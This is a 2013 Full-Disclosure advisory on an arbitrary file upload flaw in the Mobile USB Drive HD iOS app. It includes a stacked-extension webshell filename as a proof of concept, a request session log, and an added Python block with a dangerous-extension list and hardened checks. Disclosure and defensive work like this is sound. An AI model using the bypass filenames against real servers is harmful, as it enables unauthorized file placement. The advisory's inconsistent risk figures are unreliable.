List: full-disclosure
Subject: [Full-disclosure] Mobile USB Drive HD 1.2 - Arbitrary File Upload Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-06-27 23:42:03
Message-ID: 51CCCDCB.5080707 () vulnerability-lab ! com
Title:
======
Mobile USB Drive HD 1.2 - Arbitrary File Upload Vulnerability
Date:
=====
2013-06-27
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=989
VL-ID:
=====
989
Common Vulnerability Scoring System:
====================================
6.8
Introduction:
=============
Mobile Drive is a powerful tool that allows you to quickly store and view files. You can transfer files between PC/Mac and your device via WiFi, iTunes USB, FTP and iCloud. No more worries about losing important files again!
File Manager
- Global File Search
- Folder and sub-folder support
- Move, rename, copy, delete, zip files and folders
- Extract ZIP files
- Sorting by name, date, size
File viewer
- PDF Viewer (support bookmark, thumbnail, AirPrint)
- Full-Featured Photo Viewer
- Document viewer supports Word, Excel, PPT, PDF, iWork, html, txt, rtf, webarchive file formats
- Video player support mp4, mov, 3gp, m4v formats
- Open files in other apps
File Transfer and Backup
- Wirelessly transfer files via Wifi
- FTP File Transfer support (easily download, upload, rename, and delete files and folders)
- iTunes USB File Sharing support (the fastest and the easiest way)
- Access and edit files with different devices via iCloud
- Transfer files via Email
- File Backup: WiFi, iTunes USB, FTP, Open-In, iCloud
Password Protection Feature, three choices
• 4-digit password
• character password
• gestures password
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/mobile-usb-drive-for-iphone/id622590148 )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Mobile USB Drive HD v1.2 Apple iOS application.
Report-Timeline:
================
2013-06-27: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: Mobile USB Drive HD 1.2
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
An arbitrary file upload web vulnerability (reported together with a local file include issue) via POST request is present in the Mobile USB Drive HD v1.2 Apple iOS application. It allows remote attackers to upload files whose names carry multiple (stacked) extensions and then to access them without authorization on the application side of the service.

The vulnerability is located in the file upload module of the app's embedded web server (http://localhost:8080/, reachable over the device's WiFi address as the session log below shows), which accepts a manipulated filename supplied via POST. The upload filter is bypassed by a stacked extension: a name such as webshell-js.php.png.txt.iso.php.gif is accepted because it ends in an image extension, the file is stored under /files/, and it appears in the index listing of the affected module as soon as that listing is reloaded. Remote attackers can therefore exchange the filename for one with a triple (or longer) extension to get past the filter and retrieve, or attempt to execute, the files placed on the application's small web server. In the session log below the uploaded file is served back with a 200 response and no Content-Type header (the browser records it as application/x-unknown-content-type), which confirms that the stacked-extension file is stored and retrievable; whether such a file is executed rather than merely served depends on how the requesting client handles it.

Exploitation requires no user interaction and no application user account, since the web server has no password protection by default. Successful exploitation results in unauthorized path or file access via local file include or arbitrary file upload.
Vulnerable Application(s):
[+] Mobile USB Drive HD v1.2 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] File Upload (Web Server) [Remote]
Vulnerable Parameter(s):
[+] filename
[+] file extensions (multiple)
Affected Module(s):
[+] MUD HD Index Listing
Proof of Concept:
=================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction and without a privileged application user account. For demonstration or reproduction ...
PoC: http://localhost:8080/files/webshell-js.php.png.txt.iso.php.gif
Review: File Management.htm - Index
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href="http://localhost:8080/files/webshell-js.php.png.txt.iso.php.gif" class="file">webshell-js.php.png.txt.iso.php.gif</a></td>
--- Session Log ---
21:01:24.132[0ms][total 0ms]
Status: pending[]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:8080/]
21:01:32.643[0ms][total 0ms]
Status: pending[]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:8080/]
21:01:43.184[125ms][total 177ms]
Status: 200[OK]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[98139] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:8080/]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Accept-Ranges[bytes]
Content-Length[98139]
Date[Thu, 27 Jun 2013 19:06:58 GMT]
21:01:43.389[2393ms][total 2393ms]
Status: 200[OK]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif
Load Flags[LOAD_NORMAL] Content Size[98139] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[98139]
Date[Thu, 27 Jun 2013 19:07:00 GMT]
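The following Python is an added example and not code from the application or from the advisory's author. It contrasts the kind of last-extension-only check that the stacked filenames in this advisory defeat with a hardened check, a server-chosen stored name, and the response headers a practitioner would send when serving uploads back (the session log above shows the app sending none). The upload handler, its allowed-extension set, the dangerous-extension list and the content-type map are all assumptions; only the two filenames are taken from the PoC and session log above. A triage helper for scanning names already present in a /files/ index listing is included as well.

```python
import re
import secrets

# Extensions the hypothetical upload handler intends to accept for viewing (assumption).
ALLOWED = {"gif", "png", "jpg", "jpeg", "pdf", "txt"}

# Extensions that should never appear anywhere in a stored filename, whether or
# not this particular server would execute them (assumption, not the app's list).
DANGEROUS = {"php", "phtml", "php3", "php5", "jsp", "asp", "aspx",
             "cgi", "pl", "py", "sh", "htm", "html", "js", "svg"}

# Content-Type to send back for each accepted extension (constructed map).
CONTENT_TYPES = {"gif": "image/gif", "png": "image/png", "jpg": "image/jpeg",
                 "jpeg": "image/jpeg", "pdf": "application/pdf", "txt": "text/plain"}

# Filenames taken from the advisory's PoC and session log.
ADVISORY_NAMES = ["webshell-js.php.png.txt.iso.php.gif", "1234.png.txt.iso.php.gif"]


def weak_is_allowed(filename: str) -> bool:
    """Last-extension-only check: the class of filter a stacked extension defeats."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def hardened_is_allowed(filename: str) -> bool:
    """Accept only <stem>.<ext>: exactly one dot, a conservative stem, an allowed ext.
    Path separators and NUL bytes are rejected outright."""
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    parts = filename.split(".")
    if len(parts) != 2:
        return False
    stem, ext = parts
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False
    return ext.lower() in ALLOWED


def suspicious_extensions(filename: str) -> set:
    """Every dangerous token among the dotted parts after the stem, for triaging
    what is already stored under /files/ or listed in the index page."""
    return {p.lower() for p in filename.split(".")[1:]} & DANGEROUS


def stored_name(filename: str) -> str:
    """Server-chosen name: random token plus the validated extension, so the
    client-supplied name never reaches the filesystem or the index listing."""
    if not hardened_is_allowed(filename):
        raise ValueError("rejected upload name: %r" % filename)
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(8) + "." + ext


def safe_response_headers(stored: str) -> dict:
    """Headers for serving an upload back: declare a type, forbid sniffing and
    force a download so the browser never renders the file in the app's origin."""
    ext = stored.rsplit(".", 1)[-1].lower()
    return {
        "Content-Type": CONTENT_TYPES.get(ext, "application/octet-stream"),
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="%s"' % stored,
    }


if __name__ == "__main__":
    for name in ADVISORY_NAMES + ["photo.gif", "../photo.gif", "shell.php"]:
        print("%-40s weak=%-5s hardened=%-5s suspicious=%s" % (
            name, weak_is_allowed(name), hardened_is_allowed(name),
            sorted(suspicious_extensions(name))))
    chosen = stored_name("photo.gif")
    print(chosen, safe_response_headers(chosen))
```

Both advisory filenames pass the weak check and fail the hardened one; note that the weak check also lets a traversal name such as ../photo.gif through, which is why the hardened version rejects separators before it ever looks at the extension.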
Risk:
=====
1.1
The security risk of the arbitrary file upload vulnerability and the multiple-extension filter bypass is estimated as high.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/